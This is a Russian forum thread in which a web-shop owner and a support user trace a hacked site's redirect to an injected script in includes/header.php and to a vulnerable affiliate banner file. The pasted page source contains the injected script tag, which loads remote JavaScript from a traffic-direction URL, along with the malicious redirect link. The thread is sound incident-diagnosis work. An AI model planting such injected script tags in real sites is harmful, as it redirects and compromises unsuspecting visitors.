Редирект на другой сайт

[Алексей Павлов 0]

Проблема в следующем.

Несколько дней назад иногда при входе на сайте, происходит редирект на этот сайт

http://doyarki.prodom2.com/?partner=31&city=unknow&mc=53a533355fd53d7289a48e090726cb13&chiter=110751&chitdom=tropic-flowersru&country=RU&mtr=37a7c4606bac088225cc95a0f4b25ceb&billing=smsbil

Я так понимаю взломали ftp и куда-то что-то прописали, но не могу найти где эта надость. Также при загрузке страницы, идет обращение на сайт multcube ру и gold-wm ру

Может кто сталкивался с этой проблемой

[support 447]

Смотрите на ftp список файлов, отсортируйте по дате, будет сразу видно свежие правки файла.

Возможно, что в /includes/application_top.php

[Алексей Павлов 0]

Нашел ссылку в коде HTML страницы

где ее можно найти на сайте?

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>
<meta name="verify-v1" content="Gbwg8g+u/E3P5NZbrnMlUaDTOIDd1JXxE3pUcvTq090=" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta name="robots" content="index,follow,robots" />
<meta name="company" content="" />
<meta name="author" content="" />
<meta name="publisher" content="" />
<meta name="distribution" content="global" />
<meta name="verify-v1" content="uUV+SWpgBkOfWjOtZ/UpVMZSDF9BRD2/x/4Z0b4Fifk=" />
<meta name="reply-to" content="" />
<meta name="revisit-after" content="14" />

<script type="text/javascript" src="jscript/jscript_JsHttpRequest.js"></script>
<script type="text/javascript" src="jscript/jscript_ajax.js"></script>

<script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://www.multcube.ru/tds/go.php?sid=1"></script>
</head>
<body>
[/code]
вот в самом низу идет ссылка на сайт multicube

[Алексей Павлов 0]

Сам разобрался

в файле includes/header.php

[support 447]

Да, правильно нашли.

[Алексей Павлов 0]

уже третий раз вламывают сайт. смена паролей не помагает.

в файл includes/header.php добаваляют скрипт со ссылкой на какой-либо *.js файл в этом каталоге (и файл также заливают в этот каталог)

может где-то брешь в коде? как могут попасть в папку includes?

[support 447]

NewAger

У Вас какая версия магазина, самая свежая?!

Вот возьмите /affiliate_show_banner.php файл и перепишите к себе.

Комп Ваш точно без вирусов?!

affiliate_show_banner.php

[Алексей Павлов 0]

Да, комп точно без вирусов. Стоит Norton Internet Security

версия магазина 1.55

файл закинул

[support 447]

Давайте тогда подождём, вот в этом файле была дырка через которую можно было нагадить немного.

Если ещё раз повторится, Вы мне тогда скиньте доступ на ftp и самое главное - нужен будет доступ к лог-файлам веб-сервера, что б можно было найти, откуда ноги растут, в смысле почему и как ломают.

[Алексей Павлов 0]

Здравствуйте!

Опять сломали

Как с Вами связаться?

[support 447]

vamshop@gmail.com

Если вставляют iframe, то это процентов на 90% у Вас вирус на компе.